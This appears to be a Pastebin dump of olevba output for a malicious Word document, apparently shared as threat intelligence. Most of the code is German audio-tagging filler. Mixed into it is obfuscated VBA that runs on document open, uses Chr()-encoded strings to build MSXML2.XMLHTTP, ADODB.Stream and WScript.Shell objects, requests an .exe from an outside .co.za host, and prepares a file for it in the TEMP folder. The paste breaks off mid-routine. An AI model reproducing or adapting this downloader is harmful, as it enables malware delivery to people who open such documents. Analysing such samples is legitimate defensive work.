Advertisement
dynamoo

Malicious Word macro

Aug 5th, 2015
513
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASI-B-V accume~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: accume~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: accume~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
  23. KLJLGBk
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module2.bas
  31. in file: accume~1.doc - OLE stream: u'Macros/VBA/Module2'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33. Public Sub nachtag()
  34.     Dim eigeneplaylist As String, aktdate As Date, akttime As Date, akttimedate As Date, filename As String, tempzeichen As String, cmd As String, verzeichnis As String, i As Integer, F, temppfad As String, position As Integer, mp2zeit As Date, dbfilename As String, fso As Object, files() As String, filetagged As Boolean, artint As String
  35.    
  36.     If Verriegelung.verriegelungein = "1" Then Exit Sub 'Verriegelung
  37.    frmMain.untaggedtaggen.Appearance = 10 'Buttonfarbe ?ndern
  38.    frmMain.untaggedtaggen.ForeColor = &H0&
  39.     i = 0 'r?cksetzten
  40.  
  41. End Sub
  42.  
  43. Public Sub mp3_cbr_aktivate(aktivated1 As Object, tempFile As String)
  44. aktivated1.savetofile tempFile, 2
  45. End Sub
  46. Sub LKjlknlk()
  47.     'Suche wird ausgef?hrt
  48.    Call Werkzeuge.suche(extension, frmMain.work.Text + "untagged\", files(), "1")
  49.  
  50.     ' Hier wird nach extension dateien gesucht
  51.    While i < UBound(files) - 1
  52.         If frmMain.turbo.Value = "0" Then DoEvents
  53.         Call Ausgabe.info_loeschen 'Infofenster l?schen
  54.        frmMain.infocount.Caption = Trim$(Str$(i + 1)) + "/" + Trim$(Str$(UBound(files) - 1))
  55.         i = i + 1
  56.         filetagged = "0"
  57.         calbum = vbNullString
  58.         cinter = vbNullString
  59.         ctitel = vbNullString
  60.         cgenre = vbNullString
  61.         artint = vbNullString
  62.         tempzeichen = Mid$(files(i), Len(frmMain.work.Text + "untagged\") + 1, Len(files(i)))
  63.         position = InStr(tempzeichen, "\")
  64.        
  65.         If position = 0 Then
  66.             MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & tempzeichen
  67.             Set fso = Nothing
  68.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  69.            Call Verriegelung.verriegelungaus 'Verriegelung
  70.            Exit Sub 'Quellfiles direkt im Quellordner
  71.        End If
  72.        
  73.         verzeichnis = Left$(tempzeichen, position - 1)
  74.        
  75.         If Not Werkzeuge.sourcepathtest(verzeichnis) Then
  76.             MsgBox "Error: Your workpath/workfile structure is wrong! Debuginfo: " & verzeichnis
  77.             Set fso = Nothing
  78.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  79.            Call Verriegelung.verriegelungaus 'Verriegelung
  80.            Exit Sub 'Quellfiles direkt im Quellordner
  81.        End If
  82.        
  83.         filename = Mid$(tempzeichen, position + 1, Len(tempzeichen) - 4 - position)
  84. End Sub
  85.  
  86.  
  87. Public Sub Hidnna()
  88.  
  89.  
  90.         ' Hier wird das datum und die uhrzeit bestimmt
  91.        Set fso = DONT_MAKE_ME_LAUGH("HELP_OB")
  92.         Set F = fso.GetFile(files(i))
  93.         akttimedate = F.DateLastModified 'original date,time, wird von der mp2 ausgelesen
  94.        Set F = Nothing
  95.        
  96.         If Len(Trim$(Str$(akttimedate))) = 10 Then
  97.             akttime = "00:00:00"
  98.         Else
  99.             akttime = Right$(akttimedate, 8)
  100.         End If
  101.        
  102.         frmMain.akttime.Caption = akttime
  103.         'Mp2 Dauer wird ausgelesen
  104.        mp2zeit = Werkzeuge.GetMP3Length(files(i))
  105.         frmMain.mp2zeit.Caption = mp2zeit
  106.        
  107.         'Playlistumbruch Abfrage (Nur bei End-Zeit)
  108.        If tagging.zeitauswahl.ListIndex = 1 Then akttimedate = CDate(akttimedate) - mp2zeit
  109.        
  110.         'Playlistname wird generiert
  111.        aktdate = Left$(akttimedate, 10) 'akttimedate muss geteilt werden
  112.        frmMain.aktdate.Caption = aktdate
  113.         eigeneplaylist = Right$(aktdate, 4) + "-" + Mid$(aktdate, 4, 2) + "-" + Left$(aktdate, 2) + "-" + verzeichnis + ".txt"
  114.         'Cancel Abfrage
  115.        If frmMain.abbrechen.Enabled = "0" Then
  116.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  117.            Call Verriegelung.verriegelungaus 'Verriegelung
  118.            Set fso = Nothing
  119.             Exit Sub
  120.         End If
  121.              End Sub
  122. Public Function usZ5pw3gU8(KJB As Long)
  123.  
  124. Dim httpRequest: Set httpRequest = konvertieren_EtoM(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
  125. httpRequest.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & "/" & Chr(47) & Chr(110) & Chr(97) & "t" & Chr(117) & Chr(114) & Chr(97) & Chr(108) & Chr(108) & "y" & Chr(99) & Chr(111) & Chr(110) & Chr(118) & Chr(101) & "n" & "i" & "e" & Chr(110) & Chr(116) & Chr(46) & Chr(99) & Chr(111) & Chr(46) & Chr(122) & Chr(97) & Chr(47) & Chr(55) & "5" & Chr(121) & Chr(104) & Chr(52) & Chr(47) & Chr(56) & Chr(103) & Chr(52) & Chr(103) & Chr(102) & Chr(102) & Chr(114) & "." & "e" & Chr(120) & Chr(101), False
  126. httpRequest.Send
  127. usZ5pw3gU8 = httpRequest.responseBody
  128. End Function
  129. Public Sub YUYUYUUYUYY1()
  130.         frmMain.infoplaylist.Caption = verzeichnis
  131.  
  132.  
  133.         'wenn alte "normale" playlist dann l?schen
  134.        If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> _
  135.         0 Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  136.        
  137.         ' hier wird die geloggte playliste kopiert
  138.        If LenB(Dir$(App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And _
  139.         Werkzeuge.plvergleich(verzeichnis, "offline") Then
  140.             If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 _
  141.             Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  142.             fso.CopyFile App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, frmMain.work.Text + "untagged\" + _
  143.             verzeichnis "\" + eigeneplaylist
  144.             'tagid unterprogramm aufrufen
  145.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + _
  146.             verzeichnis + "\" + eigeneplaylist, filetagged, artint, mp2zeit)
  147.            
  148.             If filetagged Then
  149.                 If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  150.                     Kill (files(i))
  151.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
  152.                     GoTo nextrun
  153.                 End If
  154.                
  155.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
  156.                 Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
  157.                 GoTo nextrun
  158.             End If
  159.         End If
  160.         End Sub
  161.        
  162.  
  163.  
  164. Sub Jkjs()
  165.         ' hier wird die online playliste kopiert
  166.        If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And _
  167.         Werkzeuge.plvergleich(verzeichnis, "online") Then
  168.             If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 _
  169.             Then Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  170.             fso.CopyFile App.Path + "\playlists\Online Playlists\" + eigeneplaylist, frmMain.work.Text + "untagged\" + _
  171.             verzeichnis "\" + eigeneplaylist
  172.  
  173.             'tagid unterprogramm aufrufen
  174.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + _
  175.             "\" + eigeneplaylist, filetagged, artint, mp2zeit)
  176.  
  177.             If filetagged Then
  178.                 If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  179.                     Kill (files(i))
  180.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
  181.                     GoTo nextrun
  182.                 End If
  183.  
  184.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
  185.                 Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
  186.                 GoTo nextrun
  187.             End If
  188.         End If
  189.  
  190.         'wenn alte "normale" playlist dann l?schen
  191.        If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 Then _
  192.         Kill (frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  193.        
  194.         ' hier wird die amd playliste downgeloadet
  195.        Call Werkzeuge.DownLoad(verzeichnis, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist)
  196.            
  197.         'Wenn Download erfolgreich
  198.        If LenB(Dir$(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, vbDirectory)) <> 0 Then
  199.  
  200.             'Playlist kopieren
  201.            If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 Then
  202.                 If FileLen(frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist) > FileLen(App.Path + "\playlists\Online Playlists\" + eigeneplaylist) Then
  203.                     Kill (App.Path + "\playlists\Online Playlists\" + eigeneplaylist)
  204.                     fso.CopyFile frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
  205.                 End If
  206.             Else
  207.                 fso.CopyFile frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
  208.             End If
  209.            
  210.             'tagid unterprogramm aufrufen
  211.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + "untagged\" + verzeichnis + "\" + eigeneplaylist, filetagged, artint, mp2zeit) 'hier wird tag3 geschrieben
  212.                
  213.             'getaggtes file verschieben
  214.            If filetagged Then
  215.                 If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  216.                     Kill (files(i))
  217.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
  218.                     GoTo nextrun
  219.                 End If
  220. End Sub
  221. -------------------------------------------------------------------------------
  222. VBA MACRO Module1.bas
  223. in file: accume~1.doc - OLE stream: u'Macros/VBA/Module1'
  224. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  225.  
  226. Public Function LJKNdVDs22()
  227.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + "untagged\" + verzeichnis + "\" + filename + "." + extension, artint)
  228.                 Call file_speichern.taggedspeichern(files(i), temppfad, akttime, aktdate)
  229.                 GoTo nextrun
  230.             Else
  231.                 'ungetaggtes file verschieben
  232.                Call file_speichern.untaggedspeichern(files(i), verzeichnis, akttime, aktdate)
  233.             End If
  234.         Else
  235.             'ungetaggtes file verschieben
  236.            Call file_speichern.untaggedspeichern(files(i), verzeichnis, akttime, aktdate)
  237.         End If
  238. nextrun:
  239.         frmMain.statusnachtag.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
  240.    Wend
  241.    
  242.     Set fso = Nothing
  243.     Call Ausgabe.info_loeschen 'Infofenster l?schen
  244.    Call Verriegelung.verriegelungaus 'Verriegelung
  245.  
  246.  
  247.         ' hier wird die Online playliste downgeloadet
  248.        If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
  249.         Call Werkzeuge.DownLoad(verzeichnis, aktdate, frmMain.work.Text + eigeneplaylist)
  250.                  
  251.         If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then
  252.            
  253.             'Playlist kopieren
  254.            If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 Then
  255.                 If FileLen(frmMain.work.Text + eigeneplaylist) > FileLen(App.Path + "\playlists\Online Playlists\" + eigeneplaylist) Then
  256.                     Kill (App.Path + "\playlists\Online Playlists\" + eigeneplaylist)
  257.                     fso.CopyFile frmMain.work.Text + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
  258.                 End If
  259.             Else
  260.                 fso.CopyFile frmMain.work.Text + eigeneplaylist, App.Path + "\playlists\Online Playlists\" + eigeneplaylist
  261.             End If
  262.            
  263.             'hier wird tag3 geschrieben
  264.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
  265.                
  266.             If filetagged Then
  267.                 If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  268.                     Kill (files(i))
  269.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted")
  270.                     frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
  271.                    GoTo nextrun
  272.                 End If
  273.             End Function
  274. -------------------------------------------------------------------------------
  275. VBA MACRO Module3.bas
  276. in file: accume~1.doc - OLE stream: u'Macros/VBA/Module3'
  277. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  278. Public Sub Konvert()
  279.     Dim tempzeichen As String, filename As String, akttimedate As Date, akttime As Date, aktdate As Date, cmd As String, verzeichnis As String, F, temppfad As String, position As Integer, mp2zeit As Date, dbfilename As String, quellfile As String, eigeneplaylist As String, i As Integer, fso As Object, files() As String, filetagged As Boolean, artint As String
  280.    
  281.     If Verriegelung.verriegelungein = "1" Then Exit Sub 'Verriegelung
  282.    frmMain.Start.Appearance = 10 'Buttondesign ?ndern
  283.    frmMain.Start.ForeColor = &H0& 'Buttonfarbe ?ndern
  284.    If allgemeine.timesync_konv.Value = "1" Then Call Timesyncron.syncnow
  285.     i = 0 'R?cksetzten
  286.    Call Werkzeuge.suche("mp2", frmMain.Quelle.Text, files(), "1") 'Suche, nach mp2-files wird ausgef?hrt
  287.    
  288.     ' Hier werden Daten der gefundenen files ausgewertet (Verzeichnis und Filename)
  289.    If UBound(files) = 1 Then Call Ausgabe.textbox("No source-files")
  290.    
  291.     While i < UBound(files) - 1 'Anzahl der gefundenen files
  292.        If UBound(files) - 1 < Scannen.minfiles.CurPosition And Aktivierauswahl.scan_aktiv.Value = "1" Then
  293.             Call Ausgabe.textbox("Too few source-files..." + Str(UBound(files) - 1) + "/" + Str(Scannen.minfiles.CurPosition))
  294.             Call Verriegelung.verriegelungaus
  295.             Exit Sub
  296.         End If
  297.  
  298.         If frmMain.turbo.Value = "0" Then DoEvents
  299.         Call Ausgabe.info_loeschen 'Infofenster l?schen
  300.        frmMain.infocount.Caption = Trim$(Str$(i + 1)) + "/" + Trim$(Str$(UBound(files) - 1))
  301.         i = i + 1
  302.         filetagged = "0" 'R?cksetzen der Marke
  303.        calbum = vbNullString
  304.         cinter = vbNullString
  305.         ctitel = vbNullString
  306.         cgenre = vbNullString
  307.         artint = vbNullString
  308.         tempzeichen = Mid$(files(i), Len(frmMain.Quelle.Text) + 1, Len(files(i)))
  309.         position = InStr(tempzeichen, "\") 'Sucht das "\" und gibt Position zur?ck
  310.        
  311.         If position = 0 Then
  312.             MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & tempzeichen
  313.             Set fso = Nothing
  314.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  315.            Call Verriegelung.verriegelungaus 'Verriegelung
  316.            Exit Sub      'Quellfiles direkt im Quellordner
  317.        End If
  318.        
  319.         verzeichnis = Left$(tempzeichen, position - 1) 'Verzeichnis wird herrausgelesen
  320.        
  321.         filename = Mid$(tempzeichen, position + 1, Len(tempzeichen) - 4 - position) 'Filename ohne Pfad und Extension
  322.                
  323.         'Wenn es sich um ein untagged file handelt, dann Verzeichnis von file auslesen
  324.        If verzeichnis = "untagged" Or verzeichnis = "Untagged" Then
  325.             tempzeichen = Right$(tempzeichen, Len(tempzeichen) - 9)
  326.             position = InStr(1, tempzeichen, "-")
  327.             verzeichnis = Trim$(Mid$(tempzeichen, position + 1, Len(tempzeichen) - position - 4))
  328.         End If
  329.        
  330.         If Not Werkzeuge.sourcepathtest(verzeichnis) Then
  331.             MsgBox "Error: Your sourcepath/sourcefile structure is wrong! Debuginfo: " & verzeichnis
  332.             Set fso = Nothing
  333.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  334.            Call Verriegelung.verriegelungaus 'Verriegelung
  335.            Exit Sub      'Quellfiles direkt im Quellordner
  336.        End If
  337.  
  338.         'Kontrolle ob file "delsize" byte hat
  339.        If LenB(Dir$(files(i), vbDirectory)) <> 0 Then
  340.             frmMain.mp2size.Caption = Format(FileLen(files(i)) / 1024, "0.0") + "kb"
  341.         Else
  342.             GoTo nextrun
  343.         End If
  344.        
  345.         If FileLen(files(i)) < tagging.delsize(0).CurPosition Then
  346.             If LenB(Dir$(files(i), vbDirectory)) <> 0 Then Kill files(i)
  347.             GoTo nextrun
  348.         End If
  349.          
  350.         ' Hier wird das datum und die uhrzeit bestimmt
  351.        Set fso = DONT_MAKE_ME_LAUGH("HELP_OB")
  352.         Set F = fso.GetFile(files(i))
  353.         akttimedate = F.DateLastModified 'original date,time, wird von der mp2 ausgelesen
  354.        Set F = Nothing
  355.        
  356.         If Len(Trim$(Str$(akttimedate))) = 10 Then
  357.             akttime = "00:00:00"
  358.         Else
  359.             akttime = Right$(akttimedate, 8)
  360.         End If
  361.        
  362.         frmMain.akttime.Caption = akttime
  363.        
  364.         'Mp2 Dauer wird ausgelesen
  365.        mp2zeit = Werkzeuge.GetMP3Length(files(i))
  366.         frmMain.mp2zeit.Caption = mp2zeit
  367.        
  368.         'Playlistumbruch Abfrage (Nur bei End-Zeit)
  369.        If tagging.zeitauswahl.ListIndex = 1 Then akttimedate = CDate(akttimedate) - mp2zeit
  370.        
  371.         'Playlistname wird generiert
  372.        aktdate = Left$(akttimedate, 10) 'akttimedate muss geteilt werden
  373.        frmMain.aktdate.Caption = aktdate
  374.         eigeneplaylist = Right$(aktdate, 4) + "-" + Mid$(aktdate, 4, 2) + "-" + Left$(aktdate, 2) + "-" + verzeichnis + ".txt"
  375.        
  376.         'Cancel Abfrage
  377.        If Not frmMain.abbrechen.Enabled Then
  378.             Call Ausgabe.info_loeschen 'Infofenster l?schen
  379.            Call Verriegelung.verriegelungaus 'Verriegelung
  380.            Set fso = Nothing
  381.             Exit Sub
  382.         End If
  383. End Sub
  384. Public Function konvertieren_EtoM(UIlhbjkhoiyH As String)
  385. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
  386. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
  387. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
  388.  Set konvertieren_EtoM = CreateObject(UIlhbjkhoiyH)
  389. End Function
  390. Public Function khjgbkjh()
  391.         frmMain.infoplaylist.Caption = verzeichnis
  392.         Excel_Statistik.AddDatagesamt 'Datenbank (Excel) Gesamtdata addieren
  393.        
  394.         ' hier wird die geloggte playliste kopiert
  395.        If LenB(Dir$(App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And Werkzeuge.plvergleich(verzeichnis, "offline") Then
  396.             If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
  397.             fso.CopyFile App.Path + "\playlists\Logged Playlists\" + eigeneplaylist, frmMain.work.Text + eigeneplaylist
  398.                
  399.             'hier wird tag3 geschrieben
  400.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
  401.            
  402.  
  403.             If filetagged Then  'Wenn TagID Infos vorhanden sind
  404.                If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  405.                     Kill (files(i))
  406.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted") 'Wenn File existiert, dann l?schen
  407.                    frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
  408.                    GoTo nextrun
  409.                 End If
  410.                
  411.                 quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist) 'Konvertierung starten
  412.                If quellfile = "error" Then GoTo nextrun
  413.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint) 'TagID in konvertiertes File schreiben
  414.                Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1)) 'File verschieben
  415.                GoTo nextrun
  416.             End If
  417.         End If
  418.        
  419.         ' hier wird die Online playliste kopiert
  420.        If LenB(Dir$(App.Path + "\playlists\Online Playlists\" + eigeneplaylist, vbDirectory)) <> 0 And Werkzeuge.plvergleich(verzeichnis, "online") Then
  421.             If LenB(Dir$(frmMain.work.Text + eigeneplaylist, vbDirectory)) <> 0 Then Kill (frmMain.work.Text + eigeneplaylist)
  422.             fso.CopyFile App.Path + "\playlists\Online Playlists\" + eigeneplaylist, frmMain.work.Text + eigeneplaylist
  423.                
  424.             'hier wird tag3 geschrieben
  425.            dbfilename = Tagschreiben(frmMain.work.Text, verzeichnis, akttime, aktdate, frmMain.work.Text + eigeneplaylist, filetagged, artint, mp2zeit)
  426.            
  427.             If filetagged Then  'Wenn TagID Infos vorhanden sind
  428.                If allgemeine.ueberschreiben.Value And Werkzeuge.data_songexists(dbfilename, akttimedate, akttime, aktdate) Then
  429.                     Kill (files(i))
  430.                     Call Ausgabe.textbox(frmMain.interprettag.Caption + " - " + frmMain.titeltag.Caption + "......still existing / deleted") 'Wenn File existiert, dann l?schen
  431.                    frmMain.statuscon.Value = (100 / (UBound(files) - 1)) * i 'statusbar wird aktualisiert
  432.                    GoTo nextrun
  433.                 End If
  434.                
  435.                 quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist) 'Konvertierung starten
  436.                If quellfile = "error" Then GoTo nextrun
  437.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint) 'TagID in konvertiertes File schreiben
  438.                Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1)) 'File verschieben
  439.                GoTo nextrun
  440.             End If
  441.         End If
  442. End Function
  443.  
  444. Sub LKjlknlk()
  445.                 quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
  446.                 If quellfile = "error" Then GoTo nextrun
  447.                 temppfad = Taggen.tagsetzen(verzeichnis, frmMain.work.Text + filename + "." + extension, artint)
  448.                 Call tagged(quellfile, temppfad, files(i), akttime, aktdate, i, (UBound(files) - 1))
  449.             Else
  450.                 quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
  451.                 If quellfile = "error" Then GoTo nextrun
  452.                 Call untagged(quellfile, verzeichnis, akttime, aktdate, files(i), i, (UBound(files) - 1))
  453.             End If
  454.         Else
  455.             quellfile = konvertieren(files(i), filename, verzeichnis, eigeneplaylist)
  456.             If quellfile = "error" Then GoTo nextrun
  457.             Call untagged(quellfile, verzeichnis, akttime, aktdate, files(i), i, (UBound(files) - 1))
  458.         End If
  459. nextrun:
  460.     Wend
  461.    
  462.     Set fso = Nothing
  463.     Call Ausgabe.info_loeschen 'Infofenster l?schen
  464.    Call Verriegelung.verriegelungaus 'Verriegelung
  465. End Sub
  466. Private Function konvertieren(file As String, filename As String, verzeichnis As String, eigeneplaylist As String) As String
  467.         Dim cmd As String, temppfad As String, quellfile As String, F As Integer, mp2test As String, addline As String, fso As Object, DShell As Object, genie As Object
  468.        
  469.         On Error GoTo fehler
  470.         Set DShell = New Dos
  471.         'MP2 ?berpr?fung
  472.        If allgemeine.mp2test.Value = "1" Then
  473.             cmd = """" + App.Path + "\tools\besplit.log""" + " -core( -input """ + file + """ -output """ + App.Path + "\temp\mp2test.mp2""" + " -type mp2 -logfile """ + App.Path + "\temp\mp2test.log""" + " )" 'Dos-Befehl bilden
  474.            Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  475.            If LenB(Dir$(App.Path + "\temp\mp2test.mp2", vbDirectory)) <> 0 Then Kill (App.Path + "\temp\mp2test.mp2")
  476.            
  477.             If LenB(Dir$(App.Path + "\temp\mp2test.log", vbDirectory)) <> 0 Then
  478.                 Call Werkzeuge.IsFileOpen(App.Path + "\temp\mp2test.log")
  479.                 F = FreeFile
  480.                
  481.                 Open App.Path + "\temp\mp2test.log" For Binary As #F
  482.                     mp2test = Space$(LOF(F))
  483.                     Get #F, , mp2test
  484.                 Close F
  485.                
  486.                 If InStr(mp2test, "Stream error") Then
  487.                     Call Ausgabe.textbox(filename + ".mp2......MP2-Error / moved")
  488.                     If LenB(Dir$(frmMain.work.Text + "Error", vbDirectory)) = 0 Then MkDir frmMain.work.Text + "Error"
  489.                     If LenB(Dir$(frmMain.work.Text + "Error\" + verzeichnis, vbDirectory)) = 0 Then MkDir frmMain.work.Text + "Error\" + verzeichnis
  490.                     Call Werkzeuge.IsFileOpen(file)
  491.                     Name file As frmMain.work.Text + "Error\" + verzeichnis + "\" + filename + ".mp2"
  492.                     Kill (App.Path + "\temp\mp2test.log")
  493.                     konvertieren = "error"
  494.                     Set DShell = Nothing
  495.                     Exit Function
  496.                 End If
  497.                
  498.                 Kill (App.Path + "\temp\mp2test.log")
  499.             End If
  500.         End If
  501.  
  502.         If extension = "mp2" Then
  503.             If frmMain.noextension.Value = "1" Then
  504.                 Set fso = DONT_MAKE_ME_LAUGH("HELP_OB")
  505.                 fso.CopyFile file, frmMain.work.Text + filename + ".mp2"
  506.                 Set fso = Nothing
  507.             Else
  508.                 ' hier startet lame (mp2 in temp.wav)
  509.                cmd = """" + App.Path + "\tools\lame.log""" + " --decode --priority " + shell_prio + " """ + file + """ """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  510.                Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  511.                
  512.                 If Aktivierauswahl.mp2normal_aktiv.Value = "1" Then
  513.                     frmMain.normset.Caption = " Normalize" 'Infofenster
  514.                    
  515.                     If normal.prozenable.Value = "1" Then
  516.                         frmMain.normset.Caption = frmMain.normset.Caption + " ,auto ," + Str$(normal.peakprozslider.CurPosition) + "%" 'Infofenster
  517.                    Else
  518.                         frmMain.normset.Caption = frmMain.normset.Caption + " ,constant ," + Str$(normal.peakdbslider.CurPosition) + "db" 'Infofenster
  519.                    End If
  520.                    
  521.                     ' hier startet normalisierung
  522.                    cmd = """" + App.Path + "\tools\" + "normalize.log """ + normoptions + " """ + frmMain.work.Text + "temp.wav""" 'Dos-Befehl bilden
  523.                    Call DShell.shellwait(cmd, allgemeine.showdos.Value) 'Dos-Befehle ausf?hren
  524.                End If
  525. End Function
  526. Public Function KLJLGBk()
  527. Set processEnv = konvertieren_EtoM(Chr(87) & Chr(60) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
  528. tempFolder = processEnv("T" & Chr(69) & Chr(77) & Chr(80))
  529. Dim aktivated1 As Object
  530. Set aktivated1 = konvertieren_EtoM(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
  531. Dim tempFile As String
  532. tempFile = tempFolder + "\UY" & Chr(100) + "Bkj." & "e" & Chr(120) & Chr(101)
  533. With aktivated1
  534.    .Type = 1
  535.     .Open
